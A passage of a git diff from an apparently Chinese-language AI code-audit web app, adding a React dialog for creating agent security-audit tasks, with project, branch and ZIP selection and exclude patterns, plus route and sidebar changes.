│ │
|
||||
│ └── agents/
|
||||
│ ├── base.py # Agent 基类
|
||||
│ ├── orchestrator.py # 编排 Agent
|
||||
│ ├── recon.py # 信息收集 Agent
|
||||
│ ├── analysis.py # 分析 Agent
|
||||
│ └── verification.py # 验证 Agent
|
||||
|
||||
backend/app/models/
|
||||
└── agent_task.py # 🔄 新增 AgentCheckpoint, AgentTreeNode
|
||||
|
||||
backend/app/api/v1/endpoints/
|
||||
└── agent_tasks.py # 🔄 新增 Agent 树和检查点 API
|
||||
|
||||
backend/alembic/versions/
|
||||
└── 007_add_agent_checkpoint_tables.py # 🆕 数据库迁移
|
||||
|
||||
frontend/src/shared/api/
|
||||
└── agentTasks.ts # 🔄 扩展 Agent 树和检查点 API
|
||||
|
||||
frontend/src/pages/
|
||||
└── AgentAudit.tsx # 🆕 统一的 Agent 审计页面 (Strix-inspired)
|
||||
|
||||
frontend/src/app/
|
||||
└── routes.tsx # 🔄 新增 Agent 审计路由
|
||||
|
||||
frontend/src/components/layout/
|
||||
└── Sidebar.tsx # 🔄 新增 Agent 审计导航图标
|
||||
```
|
||||
|
||||
### 下一步计划
|
||||
|
||||
1. 测试前端页面渲染和流式事件
|
||||
2. 知识模块选择 UI
|
||||
3. 检查点恢复功能
|
||||
|
|
@ -59,6 +59,12 @@ const routes: RouteConfig[] = [
|
|||
},
|
||||
{
|
||||
name: "Agent审计",
|
||||
path: "/agent-audit",
|
||||
element: <AgentAudit />,
|
||||
visible: true,
|
||||
},
|
||||
{
|
||||
name: "Agent审计任务",
|
||||
path: "/agent-audit/:taskId",
|
||||
element: <AgentAudit />,
|
||||
visible: false,
|
||||
|
|
|
|||
|
|
@ -0,0 +1,593 @@
|
|||
/**
|
||||
* Agent 审计任务创建对话框
|
||||
* 专门用于 Agent Audit 页面,UI 风格与终端界面保持一致
|
||||
*/
|
||||
|
||||
import { useState, useEffect, useMemo } from "react";
|
||||
import { useNavigate } from "react-router-dom";
|
||||
import {
|
||||
Dialog,
|
||||
DialogContent,
|
||||
DialogHeader,
|
||||
DialogTitle,
|
||||
} from "@/components/ui/dialog";
|
||||
import { Button } from "@/components/ui/button";
|
||||
import { Input } from "@/components/ui/input";
|
||||
import { Badge } from "@/components/ui/badge";
|
||||
import { ScrollArea } from "@/components/ui/scroll-area";
|
||||
import {
|
||||
Collapsible,
|
||||
CollapsibleContent,
|
||||
CollapsibleTrigger,
|
||||
} from "@/components/ui/collapsible";
|
||||
import {
|
||||
Select,
|
||||
SelectContent,
|
||||
SelectItem,
|
||||
SelectTrigger,
|
||||
SelectValue,
|
||||
} from "@/components/ui/select";
|
||||
import {
|
||||
Search,
|
||||
ChevronRight,
|
||||
GitBranch,
|
||||
Package,
|
||||
Globe,
|
||||
Loader2,
|
||||
Bot,
|
||||
Settings2,
|
||||
Play,
|
||||
Upload,
|
||||
FolderOpen,
|
||||
} from "lucide-react";
|
||||
import { toast } from "sonner";
|
||||
import { api } from "@/shared/config/database";
|
||||
import { createAgentTask } from "@/shared/api/agentTasks";
|
||||
import { isRepositoryProject, isZipProject } from "@/shared/utils/projectUtils";
|
||||
import { getZipFileInfo, type ZipFileMeta } from "@/shared/utils/zipStorage";
|
||||
import { validateZipFile } from "@/features/projects/services/repoZipScan";
|
||||
import type { Project } from "@/shared/types";
|
||||
import FileSelectionDialog from "@/components/audit/FileSelectionDialog";
|
||||
|
||||
interface CreateAgentTaskDialogProps { // Props accepted by the Agent audit task creation dialog component.
|
||||
open: boolean; // While true, the component's effect fetches the project list and resets the form state.
|
||||
onOpenChange: (open: boolean) => void; // NOTE(review): presumably called to request an open/close change; its call sites are outside this chunk — confirm.
|
||||
}
|
||||
|
||||
const DEFAULT_EXCLUDES = [ // Glob patterns used as the initial and reset value of the dialog's exclude-pattern state; sent as `exclude_patterns` when the task is created.
|
||||
"node_modules/**",
|
||||
".git/**",
|
||||
"dist/**",
|
||||
"build/**",
|
||||
"*.log",
|
||||
];
|
||||
|
||||
export default function CreateAgentTaskDialog({
|
||||
open,
|
||||
onOpenChange,
|
||||
}: CreateAgentTaskDialogProps) {
|
||||
const navigate = useNavigate();
|
||||
|
||||
// 状态
|
||||
const [projects, setProjects] = useState<Project[]>([]);
|
||||
const [loadingProjects, setLoadingProjects] = useState(true);
|
||||
const [selectedProjectId, setSelectedProjectId] = useState<string>("");
|
||||
const [searchTerm, setSearchTerm] = useState("");
|
||||
const [branch, setBranch] = useState("main");
|
||||
const [branches, setBranches] = useState<string[]>([]);
|
||||
const [loadingBranches, setLoadingBranches] = useState(false);
|
||||
const [excludePatterns, setExcludePatterns] = useState(DEFAULT_EXCLUDES);
|
||||
const [showAdvanced, setShowAdvanced] = useState(false);
|
||||
const [creating, setCreating] = useState(false);
|
||||
|
||||
// ZIP 文件状态
|
||||
const [zipFile, setZipFile] = useState<File | null>(null);
|
||||
const [storedZipInfo, setStoredZipInfo] = useState<ZipFileMeta | null>(null);
|
||||
const [useStoredZip, setUseStoredZip] = useState(true);
|
||||
|
||||
// 文件选择状态
|
||||
const [selectedFiles, setSelectedFiles] = useState<string[] | undefined>();
|
||||
const [showFileSelection, setShowFileSelection] = useState(false);
|
||||
|
||||
const selectedProject = projects.find((p) => p.id === selectedProjectId);
|
||||
|
||||
// 加载项目列表
|
||||
useEffect(() => {
|
||||
if (open) {
|
||||
setLoadingProjects(true);
|
||||
api.getProjects()
|
||||
.then((data) => {
|
||||
setProjects(data.filter((p: Project) => p.is_active));
|
||||
})
|
||||
.catch(() => {
|
||||
toast.error("加载项目列表失败");
|
||||
})
|
||||
.finally(() => setLoadingProjects(false));
|
||||
|
||||
// 重置状态
|
||||
setSelectedProjectId("");
|
||||
setSearchTerm("");
|
||||
setBranch("main");
|
||||
setExcludePatterns(DEFAULT_EXCLUDES);
|
||||
setShowAdvanced(false);
|
||||
setZipFile(null);
|
||||
setStoredZipInfo(null);
|
||||
setSelectedFiles(undefined);
|
||||
}
|
||||
}, [open]);
|
||||
|
||||
// Load the branch list for the currently selected repository project.
useEffect(() => {
  // Flipped by the cleanup below. Without it, a response for a previously
  // selected project could arrive late and overwrite the branch list,
  // the selected branch and the loading flag of the newer selection.
  let cancelled = false;

  const loadBranches = async () => {
    // Resolve the project from the current `projects` list by id.
    const project = projects.find((p) => p.id === selectedProjectId);
    if (!project || !isRepositoryProject(project)) {
      setBranches([]);
      // A cancelled in-flight request no longer clears the flag itself,
      // so clear it here when there is nothing to load.
      setLoadingBranches(false);
      return;
    }

    setLoadingBranches(true);
    try {
      const result = await api.getProjectBranches(project.id);
      if (cancelled) return;
      console.log("[Branch] 加载分支结果:", result);

      // The endpoint can report an error alongside a branch list; surface it
      // but still apply whatever branches were returned.
      if (result.error) {
        console.warn("[Branch] 加载分支警告:", result.error);
        toast.error(`加载分支失败: ${result.error}`);
      }

      setBranches(result.branches);
      if (result.default_branch) {
        setBranch(result.default_branch);
      }
    } catch (err) {
      if (cancelled) return;
      const msg = err instanceof Error ? err.message : "未知错误";
      console.error("[Branch] 加载分支失败:", msg);
      toast.error(`加载分支失败: ${msg}`);
      // Fall back to a single-entry list so the selector stays usable.
      setBranches([project.default_branch || "main"]);
    } finally {
      // Only the request that is still current may end the loading state.
      if (!cancelled) {
        setLoadingBranches(false);
      }
    }
  };

  void loadBranches();

  return () => {
    cancelled = true;
  };
}, [selectedProjectId, projects]);
|
||||
|
||||
// Load metadata about the ZIP archive stored for the selected ZIP project.
useEffect(() => {
  // Flipped by the cleanup below so that a late response for a previously
  // selected project cannot overwrite the state of the current one.
  let cancelled = false;

  const loadZipInfo = async () => {
    if (!selectedProject || !isZipProject(selectedProject)) {
      setStoredZipInfo(null);
      return;
    }

    try {
      const info = await getZipFileInfo(selectedProject.id);
      if (cancelled) return;
      setStoredZipInfo(info);
      // Default to the stored archive whenever one exists.
      setUseStoredZip(info.has_file);
    } catch {
      // Lookup failures are treated as "no stored archive".
      if (!cancelled) {
        setStoredZipInfo(null);
      }
    }
  };

  void loadZipInfo();

  return () => {
    cancelled = true;
  };
  // Keyed on the project id only, as in the original effect.
}, [selectedProject?.id]);
|
||||
|
||||
// 过滤项目
|
||||
const filteredProjects = useMemo(() => {
|
||||
if (!searchTerm) return projects;
|
||||
const term = searchTerm.toLowerCase();
|
||||
return projects.filter(
|
||||
(p) =>
|
||||
p.name.toLowerCase().includes(term) ||
|
||||
p.description?.toLowerCase().includes(term)
|
||||
);
|
||||
}, [projects, searchTerm]);
|
||||
|
||||
// 是否可以开始
|
||||
const canStart = useMemo(() => {
|
||||
if (!selectedProject) return false;
|
||||
if (isZipProject(selectedProject)) {
|
||||
return (useStoredZip && storedZipInfo?.has_file) || !!zipFile;
|
||||
}
|
||||
return !!selectedProject.repository_url && !!branch.trim();
|
||||
}, [selectedProject, useStoredZip, storedZipInfo, zipFile, branch]);
|
||||
|
||||
// Create the agent audit task for the selected project, then close the
// dialog and navigate to the new task's page.
// NOTE(review): a newly chosen `zipFile` is not referenced in this request
// even though `canStart` accepts it — confirm the upload happens elsewhere.
const handleCreate = async () => {
  if (!selectedProject) {
    return;
  }

  const { id: projectId, name: projectName } = selectedProject;

  setCreating(true);
  try {
    // A branch is only sent for repository projects.
    const branchName = isRepositoryProject(selectedProject) ? branch : undefined;

    const { id: taskId } = await createAgentTask({
      project_id: projectId,
      name: `Agent审计-${projectName}`,
      branch_name: branchName,
      exclude_patterns: excludePatterns,
      target_files: selectedFiles,
      verification_level: "sandbox",
    });

    onOpenChange(false);
    toast.success("Agent 审计任务已创建");
    navigate(`/agent-audit/${taskId}`);
  } catch (err) {
    toast.error(err instanceof Error ? err.message : "创建失败");
  } finally {
    setCreating(false);
  }
};
|
||||
|
||||
// Handle a file picked in the ZIP upload input: validate it, and on success
// remember it and switch away from the stored archive.
const handleFileChange = (e: React.ChangeEvent<HTMLInputElement>) => {
  const input = e.target;
  const picked = input.files?.[0];
  if (!picked) {
    return;
  }

  const check = validateZipFile(picked);
  if (!check.valid) {
    toast.error(check.error || "文件无效");
    // Clear the input's value after a rejected file.
    input.value = "";
    return;
  }

  setZipFile(picked);
  setUseStoredZip(false);
};
|
||||
|
||||
return (
|
||||
<Dialog open={open} onOpenChange={onOpenChange}>
|
||||
<DialogContent className="!w-[min(90vw,480px)] !max-w-none max-h-[85vh] flex flex-col p-0 gap-0 bg-[#0d0d12] border border-gray-800 rounded-lg">
|
||||
{/* Header */}
|
||||
<DialogHeader className="px-5 py-4 border-b border-gray-800 flex-shrink-0">
|
||||
<DialogTitle className="flex items-center gap-3 font-mono text-white">
|
||||
<div className="p-2 bg-primary/20 rounded">
|
||||
<Bot className="w-5 h-5 text-primary" />
|
||||
</div>
|
||||
<div>
|
||||
<span className="text-base font-bold">New Agent Audit</span>
|
||||
<p className="text-xs text-gray-500 font-normal mt-0.5">
|
||||
AI-Powered Security Analysis
|
||||
</p>
|
||||
</div>
|
||||
</DialogTitle>
|
||||
</DialogHeader>
|
||||
|
||||
<div className="flex-1 overflow-y-auto p-5 space-y-5">
|
||||
{/* 项目选择 */}
|
||||
<div className="space-y-3">
|
||||
<div className="flex items-center justify-between">
|
||||
<span className="text-xs font-mono font-bold uppercase text-gray-400">
|
||||
Select Project
|
||||
</span>
|
||||
<Badge variant="outline" className="border-gray-700 text-gray-500 font-mono text-[10px]">
|
||||
{filteredProjects.length} available
|
||||
</Badge>
|
||||
</div>
|
||||
|
||||
{/* 搜索框 */}
|
||||
<div className="relative">
|
||||
<Search className="absolute left-3 top-1/2 -translate-y-1/2 w-4 h-4 text-gray-600" />
|
||||
<Input
|
||||
placeholder="Search projects..."
|
||||
value={searchTerm}
|
||||
onChange={(e) => setSearchTerm(e.target.value)}
|
||||
className="pl-9 h-10 bg-gray-900/50 border-gray-800 text-white font-mono placeholder:text-gray-600 focus:border-primary focus:ring-0"
|
||||
/>
|
||||
</div>
|
||||
|
||||
{/* 项目列表 */}
|
||||
<ScrollArea className="h-[200px] border border-gray-800 rounded-lg bg-gray-900/30">
|
||||
{loadingProjects ? (
|
||||
<div className="flex items-center justify-center h-full">
|
||||
<Loader2 className="w-5 h-5 animate-spin text-primary" />
|
||||
</div>
|
||||
) : filteredProjects.length === 0 ? (
|
||||
<div className="flex flex-col items-center justify-center h-full text-gray-600 font-mono">
|
||||
<Package className="w-8 h-8 mb-2 opacity-50" />
|
||||
<span className="text-sm">{searchTerm ? "No matches" : "No projects"}</span>
|
||||
</div>
|
||||
) : (
|
||||
<div className="p-1">
|
||||
{filteredProjects.map((project) => (
|
||||
<ProjectItem
|
||||
key={project.id}
|
||||
project={project}
|
||||
selected={selectedProjectId === project.id}
|
||||
onSelect={() => setSelectedProjectId(project.id)}
|
||||
/>
|
||||
))}
|
||||
</div>
|
||||
)}
|
||||
</ScrollArea>
|
||||
</div>
|
||||
|
||||
{/* 配置区域 */}
|
||||
{selectedProject && (
|
||||
<div className="space-y-4">
|
||||
{/* 仓库项目:分支选择 */}
|
||||
{isRepositoryProject(selectedProject) && (
|
||||
<div className="flex items-center gap-3 p-3 border border-gray-800 rounded-lg bg-blue-950/20">
|
||||
<GitBranch className="w-5 h-5 text-blue-400" />
|
||||
<span className="font-mono text-sm text-gray-400 w-16">Branch</span>
|
||||
{loadingBranches ? (
|
||||
<div className="flex items-center gap-2 flex-1">
|
||||
<Loader2 className="w-4 h-4 animate-spin text-blue-400" />
|
||||
<span className="text-sm text-blue-400 font-mono">Loading...</span>
|
||||
</div>
|
||||
) : (
|
||||
<Select value={branch} onValueChange={setBranch}>
|
||||
<SelectTrigger className="flex-1 h-9 bg-gray-900/50 border-gray-700 text-white font-mono focus:ring-0">
|
||||
<SelectValue placeholder="Select branch" />
|
||||
</SelectTrigger>
|
||||
<SelectContent className="bg-gray-900 border-gray-700">
|
||||
{branches.map((b) => (
|
||||
<SelectItem key={b} value={b} className="font-mono text-white">
|
||||
{b}
|
||||
</SelectItem>
|
||||
))}
|
||||
</SelectContent>
|
||||
</Select>
|
||||
)}
|
||||
</div>
|
||||
)}
|
||||
|
||||
{/* ZIP 项目:文件选择 */}
|
||||
{isZipProject(selectedProject) && (
|
||||
<div className="p-3 border border-gray-800 rounded-lg bg-amber-950/20 space-y-3">
|
||||
<div className="flex items-center gap-3">
|
||||
<Package className="w-5 h-5 text-amber-400" />
|
||||
<span className="font-mono text-sm text-gray-400">ZIP File</span>
|
||||
</div>
|
||||
|
||||
{storedZipInfo?.has_file && (
|
||||
<div
|
||||
className={`p-2 rounded border cursor-pointer transition-colors ${
|
||||
useStoredZip
|
||||
? 'border-green-500 bg-green-950/30'
|
||||
: 'border-gray-700 hover:border-gray-600'
|
||||
}`}
|
||||
onClick={() => setUseStoredZip(true)}
|
||||
>
|
||||
<div className="flex items-center gap-2">
|
||||
<div className={`w-3 h-3 rounded-full border-2 ${
|
||||
useStoredZip ? 'border-green-500 bg-green-500' : 'border-gray-600'
|
||||
}`} />
|
||||
<span className="text-sm text-white font-mono">
|
||||
{storedZipInfo.original_filename}
|
||||
</span>
|
||||
<Badge className="bg-green-500/20 text-green-400 border-0 text-[10px]">
|
||||
Stored
|
||||
</Badge>
|
||||
</div>
|
||||
</div>
|
||||
)}
|
||||
|
||||
<div
|
||||
className={`p-2 rounded border cursor-pointer transition-colors ${
|
||||
!useStoredZip && zipFile
|
||||
? 'border-amber-500 bg-amber-950/30'
|
||||
: 'border-gray-700 hover:border-gray-600'
|
||||
}`}
|
||||
>
|
||||
<label className="flex items-center gap-2 cursor-pointer">
|
||||
<div className={`w-3 h-3 rounded-full border-2 ${
|
||||
!useStoredZip && zipFile ? 'border-amber-500 bg-amber-500' : 'border-gray-600'
|
||||
}`} />
|
||||
<Upload className="w-4 h-4 text-gray-500" />
|
||||
<span className="text-sm text-gray-400 font-mono">
|
||||
{zipFile ? zipFile.name : "Upload new file..."}
|
||||
</span>
|
||||
<input
|
||||
type="file"
|
||||
accept=".zip"
|
||||
onChange={handleFileChange}
|
||||
className="hidden"
|
||||
/>
|
||||
</label>
|
||||
</div>
|
||||
</div>
|
||||
)}
|
||||
|
||||
{/* 高级选项 */}
|
||||
<Collapsible open={showAdvanced} onOpenChange={setShowAdvanced}>
|
||||
<CollapsibleTrigger className="flex items-center gap-2 text-xs font-mono text-gray-500 hover:text-gray-300 transition-colors">
|
||||
<ChevronRight className={`w-4 h-4 transition-transform ${showAdvanced ? "rotate-90" : ""}`} />
|
||||
<Settings2 className="w-4 h-4" />
|
||||
<span className="uppercase font-bold">Advanced Options</span>
|
||||
</CollapsibleTrigger>
|
||||
<CollapsibleContent className="mt-3 space-y-3">
|
||||
{/* 文件选择 */}
|
||||
{(() => {
|
||||
const isRepo = isRepositoryProject(selectedProject);
|
||||
const isZip = isZipProject(selectedProject);
|
||||
const hasStoredZip = storedZipInfo?.has_file;
|
||||
// 可以选择文件的条件:仓库项目 或 ZIP项目使用已存储文件
|
||||
const canSelectFiles = isRepo || (isZip && useStoredZip && hasStoredZip);
|
||||
|
||||
return (
|
||||
<div className="flex items-center justify-between p-3 border border-dashed border-gray-700 rounded-lg bg-gray-900/30">
|
||||
<div>
|
||||
<p className="font-mono text-xs uppercase font-bold text-gray-500">
|
||||
Scan Scope
|
||||
</p>
|
||||
<p className="text-sm text-white font-mono mt-1">
|
||||
{selectedFiles
|
||||
? `${selectedFiles.length} files selected`
|
||||
: "All files"}
|
||||
</p>
|
||||
</div>
|
||||
<div className="flex gap-2">
|
||||
{selectedFiles && canSelectFiles && (
|
||||
<Button
|
||||
size="sm"
|
||||
variant="ghost"
|
||||
onClick={() => setSelectedFiles(undefined)}
|
||||
className="h-8 text-xs text-red-400 hover:bg-red-900/30 hover:text-red-300"
|
||||
>
|
||||
Reset
|
||||
</Button>
|
||||
)}
|
||||
<Button
|
||||
size="sm"
|
||||
variant="outline"
|
||||
onClick={() => setShowFileSelection(true)}
|
||||
disabled={!canSelectFiles}
|
||||
className="h-8 text-xs border-gray-700 text-gray-300 hover:bg-gray-800 hover:text-white font-mono disabled:opacity-50"
|
||||
>
|
||||
<FolderOpen className="w-3 h-3 mr-1" />
|
||||
Select Files
|
||||
</Button>
|
||||
</div>
|
||||
</div>
|
||||
);
|
||||
})()}
|
||||
|
||||
{/* 排除模式 */}
|
||||
<div className="p-3 border border-dashed border-gray-700 rounded-lg bg-gray-900/30 space-y-3">
|
||||
<div className="flex items-center justify-between">
|
||||
<span className="font-mono text-xs uppercase font-bold text-gray-500">
|
||||
Exclude Patterns
|
||||
</span>
|
||||
<button
|
||||
type="button"
|
||||
onClick={() => setExcludePatterns(DEFAULT_EXCLUDES)}
|
||||
className="text-xs font-mono text-primary hover:text-primary/80"
|
||||
>
|
||||
Reset
|
||||
</button>
|
||||
</div>
|
||||
|
||||
<div className="flex flex-wrap gap-1.5">
|
||||
{excludePatterns.map((p) => (
|
||||
<Badge
|
||||
key={p}
|
||||
variant="secondary"
|
||||
className="bg-gray-800 text-gray-300 border-0 font-mono text-xs cursor-pointer hover:bg-red-900/50 hover:text-red-400"
|
||||
onClick={() => setExcludePatterns((prev) => prev.filter((x) => x !== p))}
|
||||
>
|
||||
{p} ×
|
||||
</Badge>
|
||||
))}
|
||||
</div>
|
||||
|
||||
<Input
|
||||
placeholder="Add pattern, press Enter..."
|
||||
className="h-8 bg-gray-900/50 border-gray-700 text-white font-mono text-sm placeholder:text-gray-600 focus:ring-0"
|
||||
onKeyDown={(e) => {
|
||||
if (e.key === "Enter" && e.currentTarget.value) {
|
||||
const val = e.currentTarget.value.trim();
|
||||
if (val && !excludePatterns.includes(val)) {
|
||||
setExcludePatterns((prev) => [...prev, val]);
|
||||
}
|
||||
e.currentTarget.value = "";
|
||||
}
|
||||
}}
|
||||
/>
|
||||
</div>
|
||||
</CollapsibleContent>
|
||||
</Collapsible>
|
||||
</div>
|
||||
)}
|
||||
</div>
|
||||
|
||||
{/* Footer */}
|
||||
<div className="flex-shrink-0 flex justify-end gap-3 px-5 py-4 bg-gray-900/50 border-t border-gray-800">
|
||||
<Button
|
||||
variant="ghost"
|
||||
onClick={() => onOpenChange(false)}
|
||||
disabled={creating}
|
||||
className="px-4 h-10 font-mono text-gray-400 hover:text-white hover:bg-gray-800"
|
||||
>
|
||||
Cancel
|
||||
</Button>
|
||||
<Button
|
||||
onClick={handleCreate}
|
||||
disabled={!canStart || creating}
|
||||
className="px-5 h-10 bg-primary hover:bg-primary/90 text-white font-mono font-bold"
|
||||
>
|
||||
{creating ? (
|
||||
<>
|
||||
<Loader2 className="w-4 h-4 animate-spin mr-2" />
|
||||
Starting...
|
||||
</>
|
||||
) : (
|
||||
<>
|
||||
<Play className="w-4 h-4 mr-2" />
|
||||
Start Audit
|
||||
</>
|
||||
)}
|
||||
</Button>
|
||||
</div>
|
||||
</DialogContent>
|
||||
|
||||
{/* 文件选择对话框 */}
|
||||
<FileSelectionDialog
|
||||
open={showFileSelection}
|
||||
onOpenChange={setShowFileSelection}
|
||||
projectId={selectedProjectId}
|
||||
branch={branch}
|
||||
excludePatterns={excludePatterns}
|
||||
onConfirm={setSelectedFiles}
|
||||
/>
|
||||
</Dialog>
|
||||
);
|
||||
}
|
||||
|
||||
/**
 * One selectable row in the project list.
 *
 * Repository projects get the blue globe icon and a "REPO" badge; every other
 * project is rendered with the amber package icon and a "ZIP" badge.
 *
 * The row is a plain `<div>`, so it is exposed as a button and wired for
 * Enter/Space so the list can be operated with the keyboard as well as the
 * mouse.
 *
 * @param project  Project to display (name, optional description, kind).
 * @param selected Whether this row is the current selection.
 * @param onSelect Invoked when the row is activated by click or keyboard.
 */
function ProjectItem({
  project,
  selected,
  onSelect,
}: {
  project: Project;
  selected: boolean;
  onSelect: () => void;
}) {
  const isRepo = isRepositoryProject(project);

  // A non-native button does not activate on Enter/Space by itself.
  const handleKeyDown = (e: React.KeyboardEvent<HTMLDivElement>) => {
    if (e.key === "Enter" || e.key === " ") {
      // Keep Space from scrolling the surrounding list.
      e.preventDefault();
      onSelect();
    }
  };

  return (
    <div
      role="button"
      tabIndex={0}
      aria-pressed={selected}
      className={`flex items-center gap-3 p-3 cursor-pointer rounded-lg transition-all ${
        selected
          ? "bg-primary/10 border border-primary/50"
          : "hover:bg-gray-800/50 border border-transparent"
      }`}
      onClick={onSelect}
      onKeyDown={handleKeyDown}
    >
      <div className={`p-1.5 rounded ${isRepo ? "bg-blue-500/20" : "bg-amber-500/20"}`}>
        {isRepo ? (
          <Globe className="w-4 h-4 text-blue-400" />
        ) : (
          <Package className="w-4 h-4 text-amber-400" />
        )}
      </div>

      <div className="flex-1 min-w-0">
        <div className="flex items-center gap-2">
          <span className={`font-mono text-sm truncate ${selected ? 'text-white font-bold' : 'text-gray-300'}`}>
            {project.name}
          </span>
          <Badge
            variant="outline"
            className={`text-[10px] px-1 py-0 font-mono ${
              isRepo
                ? "border-blue-500/50 text-blue-400"
                : "border-amber-500/50 text-amber-400"
            }`}
          >
            {isRepo ? "REPO" : "ZIP"}
          </Badge>
        </div>
        {project.description && (
          <p className="text-xs text-gray-600 mt-0.5 font-mono truncate">
            {project.description}
          </p>
        )}
      </div>

      {/* Pulsing dot marks the selected row. */}
      {selected && (
        <div className="w-2 h-2 rounded-full bg-primary animate-pulse" />
      )}
    </div>
  );
}
|
||||
|
|
@ -30,7 +30,6 @@ import {
|
|||
Upload,
|
||||
FolderOpen,
|
||||
Settings2,
|
||||
Play,
|
||||
Package,
|
||||
Globe,
|
||||
Shield,
|
||||
|
|
@ -111,28 +110,39 @@ export default function CreateTaskDialog({
|
|||
// 加载分支列表
|
||||
useEffect(() => {
|
||||
const loadBranches = async () => {
|
||||
if (!selectedProject || !isRepositoryProject(selectedProject)) {
|
||||
// 使用 selectedProjectId 从 projects 中获取最新的 project 对象
|
||||
const project = projects.find((p) => p.id === selectedProjectId);
|
||||
if (!project || !isRepositoryProject(project)) {
|
||||
setBranches([]);
|
||||
return;
|
||||
}
|
||||
|
||||
setLoadingBranches(true);
|
||||
try {
|
||||
const result = await api.getProjectBranches(selectedProject.id);
|
||||
const result = await api.getProjectBranches(project.id);
|
||||
console.log("[Branch] 加载分支结果:", result);
|
||||
|
||||
if (result.error) {
|
||||
console.warn("[Branch] 加载分支警告:", result.error);
|
||||
toast.error(`加载分支失败: ${result.error}`);
|
||||
}
|
||||
|
||||
setBranches(result.branches);
|
||||
if (result.default_branch) {
|
||||
setBranch(result.default_branch);
|
||||
}
|
||||
} catch (error) {
|
||||
console.error("加载分支失败:", error);
|
||||
setBranches([selectedProject.default_branch || "main"]);
|
||||
const msg = error instanceof Error ? error.message : "未知错误";
|
||||
console.error("[Branch] 加载分支失败:", msg);
|
||||
toast.error(`加载分支失败: ${msg}`);
|
||||
setBranches([project.default_branch || "main"]);
|
||||
} finally {
|
||||
setLoadingBranches(false);
|
||||
}
|
||||
};
|
||||
|
||||
loadBranches();
|
||||
}, [selectedProject?.id]);
|
||||
}, [selectedProjectId, projects]);
|
||||
|
||||
const filteredProjects = useMemo(() => {
|
||||
if (!searchTerm) return projects;
|
||||
|
|
@ -437,45 +447,47 @@ export default function CreateTaskDialog({
|
|||
)}
|
||||
|
||||
{/* 高级选项 */}
|
||||
{/* 规则集和提示词选择 */}
|
||||
<div className="p-3 border-2 border-black bg-purple-50 space-y-3">
|
||||
<div className="flex items-center gap-2 mb-2">
|
||||
<Zap className="w-4 h-4 text-purple-700" />
|
||||
<span className="font-mono text-sm font-bold text-purple-900 uppercase">审计配置</span>
|
||||
</div>
|
||||
<div className="grid grid-cols-2 gap-3">
|
||||
<div>
|
||||
<label className="block text-xs font-mono font-bold text-gray-600 mb-1 uppercase">规则集</label>
|
||||
<Select value={selectedRuleSetId} onValueChange={setSelectedRuleSetId}>
|
||||
<SelectTrigger className="h-9 rounded-none border-2 border-black font-mono text-xs focus:ring-0">
|
||||
<SelectValue placeholder="选择规则集" />
|
||||
</SelectTrigger>
|
||||
<SelectContent className="rounded-none border-2 border-black shadow-[4px_4px_0px_0px_rgba(0,0,0,1)]">
|
||||
{ruleSets.map((rs) => (
|
||||
<SelectItem key={rs.id} value={rs.id} className="font-mono text-xs">
|
||||
{rs.name} {rs.is_default && '(默认)'} ({rs.enabled_rules_count})
|
||||
</SelectItem>
|
||||
))}
|
||||
</SelectContent>
|
||||
</Select>
|
||||
{/* 规则集和提示词选择 - 仅快速扫描模式显示 */}
|
||||
{auditMode !== "agent" && (
|
||||
<div className="p-3 border-2 border-black bg-purple-50 space-y-3">
|
||||
<div className="flex items-center gap-2 mb-2">
|
||||
<Zap className="w-4 h-4 text-purple-700" />
|
||||
<span className="font-mono text-sm font-bold text-purple-900 uppercase">审计配置</span>
|
||||
</div>
|
||||
<div>
|
||||
<label className="block text-xs font-mono font-bold text-gray-600 mb-1 uppercase">提示词模板</label>
|
||||
<Select value={selectedPromptTemplateId} onValueChange={setSelectedPromptTemplateId}>
|
||||
<SelectTrigger className="h-9 rounded-none border-2 border-black font-mono text-xs focus:ring-0">
|
||||
<SelectValue placeholder="选择提示词模板" />
|
||||
</SelectTrigger>
|
||||
<SelectContent className="rounded-none border-2 border-black shadow-[4px_4px_0px_0px_rgba(0,0,0,1)]">
|
||||
{promptTemplates.map((pt) => (
|
||||
<SelectItem key={pt.id} value={pt.id} className="font-mono text-xs">
|
||||
{pt.name} {pt.is_default && '(默认)'}
|
||||
</SelectItem>
|
||||
))}
|
||||
</SelectContent>
|
||||
</Select>
|
||||
<div className="grid grid-cols-2 gap-3">
|
||||
<div>
|
||||
<label className="block text-xs font-mono font-bold text-gray-600 mb-1 uppercase">规则集</label>
|
||||
<Select value={selectedRuleSetId} onValueChange={setSelectedRuleSetId}>
|
||||
<SelectTrigger className="h-9 rounded-none border-2 border-black font-mono text-xs focus:ring-0">
|
||||
<SelectValue placeholder="选择规则集" />
|
||||
</SelectTrigger>
|
||||
<SelectContent className="rounded-none border-2 border-black shadow-[4px_4px_0px_0px_rgba(0,0,0,1)]">
|
||||
{ruleSets.map((rs) => (
|
||||
<SelectItem key={rs.id} value={rs.id} className="font-mono text-xs">
|
||||
{rs.name} {rs.is_default && '(默认)'} ({rs.enabled_rules_count})
|
||||
</SelectItem>
|
||||
))}
|
||||
</SelectContent>
|
||||
</Select>
|
||||
</div>
|
||||
<div>
|
||||
<label className="block text-xs font-mono font-bold text-gray-600 mb-1 uppercase">提示词模板</label>
|
||||
<Select value={selectedPromptTemplateId} onValueChange={setSelectedPromptTemplateId}>
|
||||
<SelectTrigger className="h-9 rounded-none border-2 border-black font-mono text-xs focus:ring-0">
|
||||
<SelectValue placeholder="选择提示词模板" />
|
||||
</SelectTrigger>
|
||||
<SelectContent className="rounded-none border-2 border-black shadow-[4px_4px_0px_0px_rgba(0,0,0,1)]">
|
||||
{promptTemplates.map((pt) => (
|
||||
<SelectItem key={pt.id} value={pt.id} className="font-mono text-xs">
|
||||
{pt.name} {pt.is_default && '(默认)'}
|
||||
</SelectItem>
|
||||
))}
|
||||
</SelectContent>
|
||||
</Select>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
)}
|
||||
|
||||
<Collapsible open={showAdvanced} onOpenChange={setShowAdvanced}>
|
||||
<CollapsibleTrigger className="flex items-center gap-2 text-sm font-mono text-gray-600 hover:text-black transition-colors">
|
||||
|
|
|
|||
|
|
@ -16,7 +16,8 @@ import {
|
|||
Github,
|
||||
UserCircle,
|
||||
Shield,
|
||||
MessageSquare
|
||||
MessageSquare,
|
||||
Bot
|
||||
} from "lucide-react";
|
||||
import routes from "@/app/routes";
|
||||
import { version } from "../../../package.json";
|
||||
|
|
@ -27,6 +28,7 @@ const routeIcons: Record<string, React.ReactNode> = {
|
|||
"/projects": <FolderGit2 className="w-5 h-5" />,
|
||||
"/instant-analysis": <Zap className="w-5 h-5" />,
|
||||
